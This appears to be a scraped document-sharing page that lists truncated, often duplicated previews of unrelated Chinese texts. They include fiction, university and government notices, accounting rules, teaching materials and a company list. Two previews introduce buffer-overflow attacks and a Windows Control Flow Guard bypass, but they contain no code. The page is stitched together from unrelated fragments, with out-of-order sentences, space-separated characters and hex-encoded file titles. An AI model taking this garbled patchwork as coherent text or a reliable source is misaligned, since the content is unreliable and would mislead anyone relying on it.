邻居啊 第二天 对门却悄无声息了 莫非昨夜的吵闹 仅是个幻觉 夜幕拉下时 寒风又吱溜溜地叫个不停 老婆 睡下后 我这只夜猫子 继续兴致勃勃地跟着福尔 摩斯去探案 白天的喧嚣退去了 周围格外安静 正 是读书的好时候 突然 响起了钟摆声 哒 哒 哒 节奏匀称 不疾不徐 声响却愈来愈大 格外突兀 了 原来 李 绍 武 过了元宵节 年味渐渐淡去 如同浓浓的香茶经过不断 冲泡 稀释 日子又寡淡稀松起来 已经立春了 而严寒还霸 气十足 迟迟不肯退场 回想起来 那天晚上还是有些不同寻常的 灰黄的日头 一落下 寒风便骤然而起 带着尖厉的哨音在夜空中横冲直 撞 撞得四下里哐哐哐乱响 这种情况下 竟然还有野猫发 情 在楼下声嘶力竭地哀嚎 让人心惊胆寒 我和老婆躺在 被窝里 看一部正热播的言情剧 俊男靓女们给爱情折磨成

More information

<4D6963726F736F667420576F7264202D20313231BAC520CAD7B6BCCAA6B7B6B4F3D1A732303135C4EAD7A8D2B5BCBCCAF5D6B0CEF1C6C0C6B8B9A4D7F7D2E2BCFB2E646F63>

<4D6963726F736F667420576F7264202D20313231BAC520CAD7B6BCCAA6B7B6B4F3D1A732303135C4EAD7A8D2B5BCBCCAF5D6B0CEF1C6C0C6B8B9A4D7F7D2E2BCFB2E646F63> 首 都 师 大 校 发 2015 121 号 ( 经 2015 年 第 23 次 校 长 办 公 会 讨 论 通 过 ) 根 据 学 校 工 作 安 排, 定 于 2015 年 12 月 9 日 至 2016 年 1 月 13 日 布 置 开 展 本 年 度 专 业 技 术 职 务 评 议 聘 任 工 作 现 依 据 学 校 聘 任 制 度 改 革 的 相 关 文 件 精 神, 提 出 以 下 工

More information

其 他 方 面 也 可 以 采 用 同 样 的 方 式, 这 样 又 可 以 锻 炼 除 语 文 方 面 的 其 他 能 力 了 而 英 语 方 面, 我 认 为 配 合 英 语 专 业 举 办 英 语 演 讲 比 赛 就 很 不 错 这 样 开 展 一 系 列 的 创 新 活 动, 锻 炼 多 方

其 他 方 面 也 可 以 采 用 同 样 的 方 式, 这 样 又 可 以 锻 炼 除 语 文 方 面 的 其 他 能 力 了 而 英 语 方 面, 我 认 为 配 合 英 语 专 业 举 办 英 语 演 讲 比 赛 就 很 不 错 这 样 开 展 一 系 列 的 创 新 活 动, 锻 炼 多 方 2016 年 团 总 支 学 生 会 工 作 计 划 在 11-XX 年 度 里, 建 筑 与 艺 术 学 部 团 总 支 学 生 会 将 会 在 总 结 去 年 工 作 经 验 的 基 础 上, 进 一 步 贯 彻 的 优 良 传 统 坚 持 团 结 务 实 创 新 的 工 作 精 神, 紧 密 围 绕 学 生 会 自 我 教 育, 自 我 管 理, 自 我 服 务 的 方 针, 加 强 内 部

More information

第 六 条 办 法 第 五 条 ( 三 ) 协 会 考 评, 考 评 指 考 核 评 价 第 七 条 办 法 第 六 条 职 业 操 守 包 括 的 内 容 : 个 人 诚 信 不 做 假 账 不 偷 漏 税 不 贪 污 盗 窃 等 第 八 条 企 业 财 务 管 理 人 才 评 价 实 行 五 星

第 六 条 办 法 第 五 条 ( 三 ) 协 会 考 评, 考 评 指 考 核 评 价 第 七 条 办 法 第 六 条 职 业 操 守 包 括 的 内 容 : 个 人 诚 信 不 做 假 账 不 偷 漏 税 不 贪 污 盗 窃 等 第 八 条 企 业 财 务 管 理 人 才 评 价 实 行 五 星 企 业 财 务 管 理 人 才 评 价 办 法 实 施 细 则 第 一 章 总 则 第 一 条 根 据 企 业 财 务 管 理 人 才 评 价 办 法 ( 以 下 简 称 办 法 ), 制 定 本 细 则 第 二 条 办 法 第 一 条 根 据 国 务 院 机 构 改 革 和 职 能 转 变 方 案 精 神, 指 国 务 院 机 构 改 革 和 职 能 转 变 方 案 规 定 的 按 规 定 需 要

More information

<4D6963726F736F667420576F7264202D20313034A67EABD7A4BAB3A1B1B1A8EEA8EEABD7A6DBA6E6B5FBA6F4AD70B5652E646F63>

<4D6963726F736F667420576F7264202D20313034A67EABD7A4BAB3A1B1B1A8EEA8EEABD7A6DBA6E6B5FBA6F4AD70B5652E646F63> 國 立 臺 南 大 學 104 年 度 內 部 控 制 制 度 整 體 層 級 自 行 評 估 計 畫 一 辦 理 依 據 : 行 政 院 政 府 內 部 控 制 監 督 作 業 要 點 ( 以 下 簡 稱 作 業 要 點 ) 二 計 畫 目 的 : 本 校 為 落 實 自 我 監 督 機 制, 以 合 理 確 保 內 部 控 制 持 續 有 效 運 作, 由 相 關 單 位 依 職 責 分 工 評

More information

统计工作情况汇报

统计工作情况汇报 专 业 技 术 职 务 任 职 资 格 申 报 材 料 填 报 要 求 与 说 明 专 业 技 术 职 务 任 职 资 格 评 审 表 填 报 要 求 和 说 明 一 专 业 技 术 职 务 任 职 资 格 评 审 表 填 报 要 求 和 说 明 ( 一 ) 填 表 要 求 : 申 报 人 要 具 体 全 面 真 实 准 确 地 填 写 任 现 职 以 来 的 思 想 政 治 表 现 学 术 水 平

More information

他 随 身 带 有 二 三 十 张 古 方, 白 天 卖 药, 夜 晚 将 药 材 精 细 研 末, 按 方 配 制 对 于 病 人 服 药 后 反 应, 特 别 留 心 发 现 问 题, 就 近 向 老 医 生 老 药 贩 虚 心 求 教, 千 方 百 提 高 药 效 同 时 对 于 春 夏 秋

他 随 身 带 有 二 三 十 张 古 方, 白 天 卖 药, 夜 晚 将 药 材 精 细 研 末, 按 方 配 制 对 于 病 人 服 药 后 反 应, 特 别 留 心 发 现 问 题, 就 近 向 老 医 生 老 药 贩 虚 心 求 教, 千 方 百 提 高 药 效 同 时 对 于 春 夏 秋 绵 延 二 百 年 的 成 都 同 仁 堂 成 都 陈 同 仁 堂 是 古 老 的 中 成 药 铺, 清 代 乾 隆 年 间 开 设 在 成 都 湖 广 馆 街 口, 历 史 悠 久 专 业 丸 散, 兼 营 膏 丹 以 货 真 价 实, 言 不 二 价 而 闻 名 所 制 药 品 畅 销 本 市 和 川 西 北 农 村 山 区 及 云 南 贵 州 陕 西 甘 肃 等 省 并 远 至 新 疆 西 藏

More information

目 录 第 一 章 地 方 陪 同 导 游 人 员 服 务 程 序...1 第 一 节 地 方 陪 同 导 游 人 员 的 概 念 与 职 责...1 第 二 节 服 务 准 备...2 一 熟 悉 接 待 计 划...2 二 落 实 接 待 事 宜...5 三 物 质 和 知 识 的 准 备...

目 录 第 一 章 地 方 陪 同 导 游 人 员 服 务 程 序...1 第 一 节 地 方 陪 同 导 游 人 员 的 概 念 与 职 责...1 第 二 节 服 务 准 备...2 一 熟 悉 接 待 计 划...2 二 落 实 接 待 事 宜...5 三 物 质 和 知 识 的 准 备... 马 鞍 山 高 级 技 工 学 校 旅 游 服 务 与 管 理 专 业 模 拟 导 游 教 案 0 目 录 第 一 章 地 方 陪 同 导 游 人 员 服 务 程 序...1 第 一 节 地 方 陪 同 导 游 人 员 的 概 念 与 职 责...1 第 二 节 服 务 准 备...2 一 熟 悉 接 待 计 划...2 二 落 实 接 待 事 宜...5 三 物 质 和 知 识 的 准 备...6

More information

走 吧, 到 三 峡 去 : 那 里 是 我 们 先 人 用 生 命 之 血 打 造 的 家 园 走 吧, 到 三 峡 去 : 那 里 的 浪 涛 承 载 过 千 百 万 只 我 们 先 人 驶 向 今 天 的 航 船 走 吧, 到 三 峡 去 : 那 里 的 每 一 座 青 山 都 刻 满 了 我

走 吧, 到 三 峡 去 : 那 里 是 我 们 先 人 用 生 命 之 血 打 造 的 家 园 走 吧, 到 三 峡 去 : 那 里 的 浪 涛 承 载 过 千 百 万 只 我 们 先 人 驶 向 今 天 的 航 船 走 吧, 到 三 峡 去 : 那 里 的 每 一 座 青 山 都 刻 满 了 我 走 吧, 到 三 峡 去 : 那 里 是 我 们 先 人 用 生 命 之 血 打 造 的 家 园 走 吧, 到 三 峡 去 : 那 里 的 浪 涛 承 载 过 千 百 万 只 我 们 先 人 驶 向 今 天 的 航 船 走 吧, 到 三 峡 去 : 那 里 的 每 一 座 青 山 都 刻 满 了 我 们 先 人 垦 殖 的 足 印 走 吧, 到 三 峡 去 : 看 峡 江 上 的 悬 棺, 看 藏

More information

6寸PDF生成工具

6寸PDF生成工具 第 一 章 皇 城 惊 变 战 争 与 和 平, 自 古 以 来 就 是 矛 盾 的 对 立 面, 却 又 是 密 不 可 分 的 两 个 整 体 长 久 的 和 平, 必 会 带 来 血 腥 残 酷 的 战 争, 混 乱 次 序 的 大 战 之 后 必 会 迎 来 一 段 歌 舞 升 平 的 和 平 年 代 卡 米 拉 大 陆 按 着 不 可 抗 拒 的 自 然 规 律 旋 转 着, 和 平 与

More information

Microsoft Word - 送報伕2.doc

Microsoft Word - 送報伕2.doc 送 報 伕 楊 逵 胡 風 譯 呵, 這 可 好 了! 我 想 我 感 到 了 像 背 著 很 重 很 重 的 東 西, 快 要 被 壓 扁 了 的 時 候, 終 於 卸 了 下 來 似 的 那 種 輕 快 因 為, 我 來 到 東 京 以 後, 一 混 就 快 一 個 月 了, 在 這 將 近 一 個 月 的 中 間, 我 每 天 由 絕 早 到 深 夜, 到 東 京 市 底 一 個 一 個 職

More information

Microsoft Word - N011 斷翅天使

Microsoft Word - N011 斷翅天使 斷 翅 天 使 天 色 未 央, 冷 冽 寒 風 放 肆 在 無 人 煙 的 街 道 橫 行 亂 竄, 接 近 凌 晨 時 候 的 公 路 上 還 不 見 任 何 轎 車 的 蹤 影 靜 謐 的 空 氣, 被 急 促 的 足 聲 打 破 ; 在 沒 有 其 它 雜 音 的 清 晨, 噠 噠 的 腳 步 聲 顯 得 特 別 響 亮 一 個 小 身 影 疾 步 掠 過 路 燈 下 的 光 芒, 來 到

More information

中 国 科 学 院 国 家 科 学 图 书 馆

中 国 科 学 院 国 家 科 学 图 书 馆 中 国 科 学 院 国 家 科 学 图 书 馆 攻 读 博 士 学 位 研 究 生 培 养 方 案 为 保 证 中 国 科 学 院 国 家 科 学 图 书 馆 ( 以 下 简 称 国 科 图 ) 博 士 研 究 生 的 培 养 质 量, 进 一 步 优 化 和 规 范 国 科 图 博 士 研 究 生 的 培 养 工 作 根 据 教 育 部 颁 发 的 关 于 修 订 研 究 生 培 养 方 案 的

More information

申论写作套路万能模板

申论写作套路万能模板 申 论 就 是 针 对 特 定 事 实, 用 论 据 进 行 论 证, 申 述, 把 事 情 说 清 楚, 讲 明 白 公 务 员 考 试 申 论 就 是 针 对 当 前 存 在 的 社 会 热 点 和 难 点 问 题, 进 行 分 析 论 证, 提 出 对 策 申 论 的 本 质 : 公 务 员 的 思 维 方 式 那 么 如 何 写 好 申 论 作 文? 申 论 文 章 写 作 高 分 技 巧

More information

( 地 ( ) 组 织 机 构 代 码 企 业 详 细 名 称 哈 密 地 伊 吾 792268282 新 疆 广 汇 新 能 源 有 限 公 司 玛 纳 斯 663633976 玛 纳 斯 祥 云 化 纤 有 限 公 司 玛 纳 斯 74866269611 玛 纳 斯 澳 洋 科 技 有 限 责

( 地 ( ) 组 织 机 构 代 码 企 业 详 细 名 称 哈 密 地 伊 吾 792268282 新 疆 广 汇 新 能 源 有 限 公 司 玛 纳 斯 663633976 玛 纳 斯 祥 云 化 纤 有 限 公 司 玛 纳 斯 74866269611 玛 纳 斯 澳 洋 科 技 有 限 责 附 件 2016 年 国 家 重 点 监 控 企 业 名 单 一 废 水 国 家 重 点 监 控 企 业 名 单 ( 共 2660 家 ) 新 疆 维 吾 尔 自 治 (65 家 ) ( 地 ( ) 组 织 机 构 代 码 企 业 详 细 名 称 乌 鲁 木 齐 新 792287504 新 疆 帕 戈 郎 清 真 食 品 有 限 公 司 乌 鲁 木 齐 头 屯 河 72237822 新 疆 乌 苏

More information

申請機構基本資料

申請機構基本資料 第 1 頁, 共 17 頁 有 機 農 糧 產 品 驗 證 申 請 書 驗 證 基 準 : 有 機 農 產 品 及 有 機 農 產 加 工 品 驗 證 基 準 第 一 部 份 及 第 三 部 份 驗 證 類 別 : 農 糧 產 品 農 糧 產 品 驗 證 類 型 : 初 次 申 請 重 新 申 請 驗 證 增 項 評 鑑 重 新 評 鑑 農 糧 產 品 經 營 業 者 名 稱 : 填 寫 日 期 :

More information

申請機構基本資料

申請機構基本資料 第 1 頁, 共 17 頁 有 機 農 糧 產 品 驗 證 申 請 書 驗 證 基 準 : 有 機 農 產 品 及 有 機 農 產 加 工 品 驗 證 基 準 第 一 部 分 第 二 部 分 及 第 三 部 分 驗 證 類 型 : 初 次 申 請 增 項 評 鑑 重 新 評 鑑 重 新 申 請 驗 證 驗 證 變 更 驗 證 類 別 : 農 糧 產 品 農 糧 產 品 農 糧 產 品 經 營 業 者

More information

附件1

附件1 附 件 金 融 负 债 与 权 益 工 具 的 区 分 及 相 关 会 计 处 理 规 定 为 进 一 步 规 范 优 先 股 永 续 债 等 金 融 工 具 的 会 计 处 理, 根 据 中 华 人 民 共 和 国 会 计 法 企 业 会 计 准 则 第 22 号 金 融 工 具 确 认 和 计 量 ( 以 下 简 称 金 融 工 具 确 认 和 计 量 准 则 ) 和 企 业 会 计 准 则 第

More information

~2~

~2~ 4...... 9.. 19 22 24 27 35 41-1 -~1~ 46 49 57 60 64 66 68 71. - 2 -~2~ - 3 -~3~ ( ) ( ) - 4 -~4~ - 5 -~5~ - 6 -~6~ ( ) ( ) ? - 7 -~7~ ( ) - 8 -~8~ 1942 1947 1624 70 300-9 -~9~ ! 2853 1962 1949 5 27 9 17

More information

untitled

untitled 1 010100010108 2 010100010118 3 010100010232 4 010100010513 5 010100010515 6 010100010623 7 010100020169 8 010100040001 9 010100040009 10 010100040053 11 010100040078 12 010100040103 13 010100040107 14

More information

linux 下的缓冲区溢出 裴士辉 QQ:

linux 下的缓冲区溢出 裴士辉 QQ: linux 下的缓冲区溢出 裴士辉 QQ:1628159305 Buffer Overflows 缓冲区溢出攻击 基本的思想通过修改某些内存区域, 把一段恶意代码存储到一个 buffer 中, 并且使这个 buffer 被溢出, 以便当前进程被非法利用 ( 执行这段恶意的代码 ) 2 危害性 在 UNIX 平台上, 通过发掘 Buffer Overflow, 可以获得一个交互式的 shell 在 Windows

More information

int *p int a 0x00C7 0x00C7 0x00C int I[2], *pi = &I[0]; pi++; char C[2], *pc = &C[0]; pc++; float F[2], *pf = &F[0]; pf++;

int *p int a 0x00C7 0x00C7 0x00C int I[2], *pi = &I[0]; pi++; char C[2], *pc = &C[0]; pc++; float F[2], *pf = &F[0]; pf++; Memory & Pointer trio@seu.edu.cn 2.1 2.1.1 1 int *p int a 0x00C7 0x00C7 0x00C7 2.1.2 2 int I[2], *pi = &I[0]; pi++; char C[2], *pc = &C[0]; pc++; float F[2], *pf = &F[0]; pf++; 2.1.3 1. 2. 3. 3 int A,

More information

,768 32,767 32K JMP Jnnn (386+) LOOP CALL [Label:] JMP short/near/far address L10: jmp jmp L20: L10 L20

,768 32,767 32K JMP Jnnn (386+) LOOP CALL [Label:] JMP short/near/far address L10: jmp jmp L20: L10 L20 (Jump) (Loop) (Conditional jump) CMP CALL AND SAR/SHR TEST JMP NOT SAL/SHL Jnnn* OR RCR/ROR LOOP XOR RCL/ROL RETn * nnn, JNE JL -128 127-32,768 32,767 32K JMP Jnnn (386+) LOOP CALL [Label:] JMP short/near/far

More information

untitled

untitled MODBUS 1 MODBUS...1 1...4 1.1...4 1.2...4 1.3...4 1.4... 2...5 2.1...5 2.2...5 3...6 3.1 OPENSERIAL...6 3.2 CLOSESERIAL...8 3.3 RDMULTIBIT...8 3.4 RDMULTIWORD...9 3.5 WRTONEBIT...11 3.6 WRTONEWORD...12

More information

目 录 专 稿 季 烨 文 革 之 初 北 京 师 大 二 附 中 的 红 色 暴 力 姜 培 良 之 死 与 仇 恨 教 育 评 论 唐 燕 关 于 北 京 女 十 中 教 师 孙 迪 之 死 给 王 友 琴 纠 错 校 史 王 逸 伦 编 辑 合 肥 市 第 六 中 学 校 史 关 于 文 革

目 录 专 稿 季 烨 文 革 之 初 北 京 师 大 二 附 中 的 红 色 暴 力 姜 培 良 之 死 与 仇 恨 教 育 评 论 唐 燕 关 于 北 京 女 十 中 教 师 孙 迪 之 死 给 王 友 琴 纠 错 校 史 王 逸 伦 编 辑 合 肥 市 第 六 中 学 校 史 关 于 文 革 记 忆 121 期 教 育 专 辑 ( 二 ) 1 目 录 专 稿 季 烨 文 革 之 初 北 京 师 大 二 附 中 的 红 色 暴 力 姜 培 良 之 死 与 仇 恨 教 育 评 论 唐 燕 关 于 北 京 女 十 中 教 师 孙 迪 之 死 给 王 友 琴 纠 错 校 史 王 逸 伦 编 辑 合 肥 市 第 六 中 学 校 史 关 于 文 革 中 的 记 忆 述 往 刘 海 鸥 书 声 朗 朗

More information

Microsoft Word - 1949-yildin kiyinki Jonggoning Shinjianggha bolghan hokumiranliqi

Microsoft Word - 1949-yildin kiyinki Jonggoning Shinjianggha bolghan hokumiranliqi 1949 年 后 中 国 对 新 疆 的 统 治 作 者 : 林 保 华 摘 要 : 新 疆 之 所 以 为 新, 就 说 明 自 古 以 来 并 不 是 中 国 的 领 土 新 疆 的 历 史 更 是 汉 族 入 侵 的 历 史 新 疆 当 地 老 百 姓 对 汉 人 的 统 治 一 直 不 服, 分 离 运 动 没 有 停 止 过 新 疆 有 非 常 丰 富 的 天 然 资 源, 中 国 将 建

More information

使用!pvefindaddr 更容易的开发漏洞利用

使用!pvefindaddr 更容易的开发漏洞利用 翻译题目 : 使用!pvefindaddr 更容易的开发漏洞利用 Exploit Writing Made Easier With!pvefindaddr 作者 : 仙果主页 :http://hi.baidu.com/zhanglinguo11 版权提示 : 文章版权归作者所有, 转载请注明出处, 尊重作者劳动成果 题记 : 看雪上好像没有专门介绍 Immunity Debugger 的!pvefindaddr

More information

生命科学学院2015-2016学年度学风建设实施方案

生命科学学院2015-2016学年度学风建设实施方案 生 命 科 学 学 院 2016-2017 学 年 度 学 风 建 设 实 施 方 案 学 风 是 学 校 治 学 精 神 治 学 态 度 和 治 学 原 则 的 综 合 体 现, 是 形 成 良 好 院 风 校 风 的 基 础 和 前 提, 是 培 养 高 素 质 人 才 的 关 键 学 风 的 好 坏 直 接 影 响 到 教 学 改 革 的 步 伐 和 教 学 质 量 的 提 高, 影 响 到

More information

2830 281264-1 - 1-2 3-4 - 5-6 7-8 - 9 10-11 12 17 - - 17 27 28 29 29 29 30 31 37 37 40 37 40-2 - 37 41 56-57 58-59 - 60 62-63 66-67 69-70 71-71 - 72 77 - - 3 - 2300 875 (90) ( ) 100104 (76) ( ) 13609-4

More information

國家圖書館典藏電子全文

國家圖書館典藏電子全文 1 ( ) 2 (1895-1936) (1937) 3 (1945-1960) 1 2 3 1 4 5 6 7 8 (1905-1996) 9 10 (1918-) 11 (1936-) 12 (1908-1970) 13 (1912-1993) 14 (1934-) 4 5 6 7 8 9 10 11 12 13 14 2 15 (1936-) 16 (1935-1995) 17 0 15 16

More information

前沿技术 全面绕过执行流保护 安全研究部张云海 执行流保护 (CFG,Control Flow Guard) 是微软在 Windows 10 技术预览版与 Windows 8.1 update 3 中, 默认启用的一项缓解技术 在分析 CFG 的实现机制的过程中, 我们发现了一种全面绕过 CFG 的

前沿技术 全面绕过执行流保护 安全研究部张云海 执行流保护 (CFG,Control Flow Guard) 是微软在 Windows 10 技术预览版与 Windows 8.1 update 3 中, 默认启用的一项缓解技术 在分析 CFG 的实现机制的过程中, 我们发现了一种全面绕过 CFG 的 全面绕过执行流保护 安全研究部张云海 执行流保护 (CFG,Control Flow Guard) 是微软在 Windows 10 技术预览版与 Windows 8.1 update 3 中, 默认启用的一项缓解技术 在分析 CFG 的实现机制的过程中, 我们发现了一种全面绕过 CFG 的方法, 并配合微软修复了这一问题 背景 FG 是微软在 Windows 10 技术预览 C版与 Windows

More information